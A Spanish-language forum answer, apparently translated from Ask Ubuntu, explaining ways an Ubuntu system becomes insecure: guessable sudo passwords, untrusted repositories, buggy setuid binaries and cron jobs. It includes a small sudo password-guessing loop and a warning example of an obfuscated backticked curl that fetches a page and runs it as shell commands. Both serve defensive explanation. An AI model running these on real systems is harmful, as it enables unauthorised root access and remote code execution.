No es posible descifrar la contraseña de root, ya que Ubuntu deshabilitó al usuario root de forma predeterminada. Sin embargo, si su usuario puede convertirse en root a través de sudo y su contraseña es fácil de adivinar / fuerza bruta, tiene un sistema inseguro. Script de ejemplo que intenta probar alguna contraseña:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Agregar un repositorio no confiable permite la instalación de programas de ese repositorio. Incluso si no instala explícitamente una aplicación como sudo apt-get install [app-from-repo]
, el repositorio aún puede afectar a otros programas al hacer que Ubuntu crea que el repositorio contiene una versión más nueva de un determinado programa.
El proceso de actualización se ejecuta como root; de lo contrario, los archivos no se podrían escribir en /usr/bin
o /etc
. Un disparador de instalación también se ejecuta como root y puede ejecutarse de manera arbitraria, y posiblemente, comandos dañinos. Ahora, no se preocupe, se necesita una acción manual para actualizar los programas y los repositorios de Ubuntu son seguros. El software de código cerrado como Windows nunca puede ser completamente confiable porque no puede verificar el código fuente malicioso, pero puede revisar el código fuente de la aplicación Ubuntu si lo necesita (no se aplica a programas propietarios como sun-java6
Flash).
Como mencionó Javier Rivera, los errores del kernel pueden conducir a la ejecución de código arbitrario, pero el software con errores también es posiblemente peligroso, especialmente setsuid
los binarios raíz con errores (binarios que se ejecutarán bajo el propietario del archivo, raíz) y otros programas con errores que se ejecutan como raíz.
Puede crear agujeros de seguridad en su sistema si no presta atención a lo que está haciendo. Por ejemplo, sin comprender completamente el concepto de cronjobs, ha agregado un cronjob al /etc/cron.daily
que se ejecuta un programa en su carpeta de inicio (por ejemplo, /bin/sh /home/your-username/myscript.sh
si el archivo myscript.sh es editable por usted, puede eliminarlo, un exploit podría generar malware código en el myscript.sh
que se ejecutaría como root (escalada de privilegios).
Para mantenerse a salvo, use su mente! No ejecute comandos de fuentes no confiables si no sabe lo que hace. Si alguien le dice que corra `curl 3221233674`
con tic-tac, no lo haga. 3221233674 es otra forma de escribir 192.0.32.10
(IP de example.com). Entonces, sería igual a:
`curl http://example.com/`
Esos ticks de retroceso hacen que la salida se ejecute como comandos de shell. En inglés simple, "Descargue la página http://example.com/ e intente ejecutar la página descargada".
Al principio, no verías algo malicioso en el comando dado. Pero ahora, sabes que también se puede abusar de él.
Siempre revise los comandos / guiones que obtiene de fuentes no confiables, como Internet.